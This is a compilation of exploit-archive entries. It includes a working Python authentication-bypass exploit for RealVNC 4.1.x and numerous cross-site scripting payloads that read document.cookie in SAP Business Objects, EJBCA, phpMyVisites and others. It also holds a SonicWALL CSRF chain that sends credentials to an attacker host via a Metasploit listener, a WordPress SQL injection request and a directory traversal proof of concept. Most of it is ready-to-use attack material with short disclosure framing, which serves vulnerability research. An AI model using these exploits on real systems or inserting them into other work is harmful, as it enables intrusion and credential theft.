# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit # Date: 2012-05-13 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1.0 and 4.1.1 # Tested on: Windows XP # CVE: CVE-2006-2369 # Requires vncviewer installed # Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use) import select import thread import os import socket import sys, re BIND_ADDR = '127.0.0.1' BIND_PORT = 4444 def pwn4ge(host, port): socket.setdefaulttimeout(5) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: server.connect((host, port)) except socket.error, msg: print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1] sys.exit(); else: hello = server.recv(12) print "[*] Hello From Server: " + hello if hello != "RFB 003.008\n": print "[*] The remote VNC service is not vulnerable" sys.exit() else: print "[*] The remote VNC service is vulnerable" listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: listener.bind((BIND_ADDR, BIND_PORT)) except socket.error , msg: print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] sys.exit() print "[*] Listener Socket Bind Complete" listener.listen(10) print "[*] Launching local vncviewer" thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),)) print "[*] Listener waiting for VNC connections on localhost" client, caddr = listener.accept() listener.close() client.send(hello) chello = client.recv(12) server.send(chello) methods = server.recv(2) print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client" client.send("\x01\x01") client.recv(1) server.send("\x01") server.recv(4) client.send("\x00\x00\x00\x00") print "[*] Proxying data between the connections..." running = True while running: selected = select.select([client, server], [], [])[0] if client in selected: buf = client.recv(8192) if len(buf) == 0: running = False server.send(buf) if server in selected and running: buf = server.recv(8192) if len(buf) == 0: running = False client.send(buf) pass client.close() server.close() sys.exit() def printUsage(): print "[*] Read the source, Luke!" def main(): try: SERV_ADDR = sys.argv[1] SERV_PORT = sys.argv[2] except: SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ") SERV_PORT = 5900 try: socket.inet_aton(SERV_ADDR) except socket.error: printUsage() else: pwn4ge(SERV_ADDR, int(SERV_PORT)) if __name__ == "__main__": main()

source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP Business Objects XI R2 is vulnerable; other versions may be affected. http://www.example.com/businessobjects/enterprise115/InfoView/listing.aspx searchText=</script><script>alert(1);</script>

source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP Business Objects XI R2 is vulnerable; other versions may be affected. https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id=&#039;+alert(&#039;XSS&#039;)+&#039;#

source: https://www.securityfocus.com/bid/52361/info SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP Business Objects XI R2 is vulnerable; other versions may be affected. https://www.example.com/businessobjects/enterprise115/infoview/help/helpredir.aspx?guide=&#039;+alert(&#039;XSS 1&#039;)+&#039;&lang=en&rpcontext=&#039;+alert(&#039;XSS 2&#039;)+&#039;#

source: https://www.securityfocus.com/bid/52400/info EJBCA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. EJBCA 4.0.7 is vulnerable; other versions may also be affected. http://www.example.com/ejbca/publicweb/webdist/certdist?cmd=revoked&issuer=%3Cscript%3Ealert(document.cookie)%3C/script%3E&serno=1

source: https://www.securityfocus.com/bid/52399/info singapore is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. singapore 0.10.1 is vulnerable; other versions may also be affected. http://www.example.com/patch/index.php?gallery=<script>alert('31337')</script>

source: https://www.securityfocus.com/bid/52377/info phpMyVisites is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. phpMyVisites 2.4 is vulnerable; other versions may also be affected. <html> <head> <title>Warning! This is Proof Of Concept Exploit for phpMyVisites 2.4 (version.php 238 2009-12-16 19:48:15Z matthieu_ $)</title> </head> <h1> Warning! This is a Proof Of Concept Exploit for phpMyVisites 2.4:<br/></h1> <p>// $Id: version.php 238 2009-12-16 19:48:15Z matthieu_ $ PHPMV_VERSION 2.4 </p> </h1> <body onload="javascript:document.forms[0].submit()"> <form action="http://CHANGE_TO_RTARGET/phpmv2/index.php?mod=install_database_setup" method="post" name="form_phpmv" id="form_phpmv"> <input value="<script>alert(document.cookie);</script>" name="form_dblogin" type="hidden" /> <input value="<script>alert(document.cookie);</script>" name="form_dbpassword" type="hidden" /> <input value="<script>alert(document.cookie);</script>" name="form_dbhost" type="hidden" /> <input value="<script>alert(document.cookie);</script>" name="form_dbname" type="hidden" /> <input value="<script>alert(document.cookie);</script>" name="form_dbprefix" type="hidden"/></td> <!--- Author: AkaStep --> </form> </body> </html>

# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery # Date: 04/28/2015 # Exploit Author: Veit Hailperin # Vendor Homepage: www.dell.com # Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv # CVE : 2015-2248 Exploitation Procedure (Outline): 1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker. 2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay. 3. Gather the credentials on the target server provided in step #1 1. Create a bookmark: <html> <body> <form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST"> <input type="hidden" name="bmName" value="foo" /> <input type="hidden" name="host" value="www.malicious-host.tld" /> <input type="hidden" name="description" value="bar" /> <input type="hidden" name="tabs" value="Baz" /> <input type="hidden" name="service" value="HTTP" /> <input type="hidden" name="fbaSSOEnabled" value="on" /> <input type="hidden" name="fbaSSOFormUserName" value="user" /> <input type="hidden" name="fbaSSOFormUserPassword" value="password" /> <input type="hidden" name="MC&#95;App" value="inherit" /> <input type="hidden" name="MC&#95;Copy" value="inherit" /> <input type="hidden" name="MC&#95;Print" value="inherit" /> <input type="hidden" name="MC&#95;Offline" value="inherit" /> <input type="hidden" name="name" value="name" /> <input type="hidden" name="type" value="type" /> <input type="hidden" name="owner" value="owner" /> <input type="hidden" name="cmd" value="add" /> <input type="hidden" name="wantBmData" value="true" /> <input type="hidden" name="ok" value="OK" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Call the newly created bookmark This might require some guesswork, because we don't know which value bookmarkAccessed needs to have. <html> <body> <form action="https://vulnerable.vpn-installation.tld/cgi-bin/http"> <input type="hidden" name="HOST" value="www.malicious-host.tld" /> <input type="hidden" name="bookmarkAccessed" value="4" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3. Set up a listener E.g. metasploit payload use auxiliary/server/capture/http_basic msf auxiliary(http_basic) > [*] Listening on 0.0.0.0:80... [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://www.malicious-host.tld:80/ [*] Server started. [*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld [+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"

IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability [CVE-2014-0910] [+] Author: Filippo Roncari [+] Target: IBM WebSphere Portal [+] Version: 7.0, 6.1.5, 6.1.0 [+] Vendor: http://www.ibm.com [+] Accessibility: Remote [+] Severity: Medium [+] CVE: CVE-2014-0910 [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf [+] Info: f.roncari@securenetwork.it [+] Summary IBM WebSphere Portal is a leader in the market product that provides enterprise web portals to help companies deliver a highly-personalized, social experience for their customers. IBM WebSphere Portal gives users a single point of access to the applications, services, information and social connections they need. [+] Vulnerability Details IBM WebSphere Portal is prone to a stored Cross-Site Scripting (XSS) vulnerability in the Web Content Management component, which allows authenticated users to inject arbitrary JavaScript. A potential attacker authenticated to the Web Content Management can exploit this vulnerability by creating a malicious web content and persuading the victim to visit it. This issue can lead to different kind of user-targeted attacks such as cookie stealing and account violation. [+] Technical Details View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf for technical details and source code. [+] Proof of Concept (PoC) Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used: [!] Sample Payload ------------------------- <img src=a onerror=alert(document.cookie)> ------------------------- An exemplifying HTTP request is reported below. [!] PoC HTTP Request ------------------------- POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host: Proxy-Connection: keep-alive Content-Length: 20108 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAzBIVym1up1GRKBv Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wh" save_and_read_controllable ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wa" [...] true ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14Content_inithtml" ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_cmpnt_map_19W14388ed1e14Content" <img src=a onerror=alert(document.cookie)> ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14_RTE" ------------------------- For further details and explanations check the full advisory. [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.

# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6

source: https://www.securityfocus.com/bid/52416/info Synology Photo Station is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Photo Station 5 DSM 3.2 (1955) is vulnerable; other versions may also be affected. http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%29%29%3c%2f%73%63%72%69%70%74%3e http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%61%20%68%72%65%66%3d%22

Document Title: =============== Album Streamer v2.0 iOS - Directory Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1481 Release Date: ============= 2015-05-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1481 Common Vulnerability Scoring System: ==================================== 6.6 Product & Service Introduction: =============================== 1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and Videos to your computer. It takes only single tap to stream and download all/selected photos or videos. You can even view or play slide show of all your photos directly on the computer without downloading. (Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Spider Talk Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Path Traveral web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application. The security vulnerability allows a remote attacker to unauthorized request system path variables to compromise the mobile application or apple iOS device. The vulnerability is located in the `id` request to the `path` value of the photoDownload module. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the picture assets id path request of the photoDownload module with a malicious payload like ./etc/passwd ./etc/hosts. The attack vector is located on the application-side of the service and the request method to execute is GET (client-side). The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise Request Method(s): [+] GET Vulnerable Module(s): [+] photoDownload Vulnerable Parameter(s): [+] id Affected Module(s): [+] photoDownload Item Index Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc Vulnerable Source(s): localhost/photoDownload <div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div> <!-- PREVIEW SECTION --> <div style="display: none;" id="overlay"></div> <div style="display: none;" id="popupBox"> <div style="display: none;" id="popupContent"> <img class="previewLoadingImage" id="previewLoading" src="/loading.gif"> <img class="previewImage" src="/photoDownload?id=id1"> <img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px"> <img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px"> </div> </div> <!-- BREAK --> <div class="sectionBreak"> </div> <!-- VIDEOS SECTION --> <div> <h1> <input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos <input class="btnVideoDownload" value="Download (Selected)" type="button"> </h1> </div> --- Poc Session Logs [GET] --- Status: 200[OK] GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[25568] Content-Disposition[: attachment; filename=asset.JPG] Date[Thu, 30 Apr 2015 13:29:14 GMT] Reference(s): http://localhost/ http://localhost/photoDownload Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse of the id value in the photoDownload module. Restrict the input and disallow special chars to prevent further path traversal attacks. implement a whitelist to request only authroized urls through the mobile app api. Security Risk: ============== The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

source: https://www.securityfocus.com/bid/52424/info TP-LINK TL-WR740N is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or script code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. TP-LINK TL-WR740N 111130 is vulnerable; other versions may also be affected. 1. Go to http://www.example.com/maintenance/tools_test.htm 2. make ping like &lt;/textarea&gt;<script>prompt(2)</script>

source: https://www.securityfocus.com/bid/52425/info Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Wikidforum 2.10 is vulnerable; other versions may also be affected. Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection] Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]

source: https://www.securityfocus.com/bid/52425/info Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Wikidforum 2.10 is vulnerable; other versions may also be affected. Search-Field -> '"</script><script>alert(document.cookie)</script>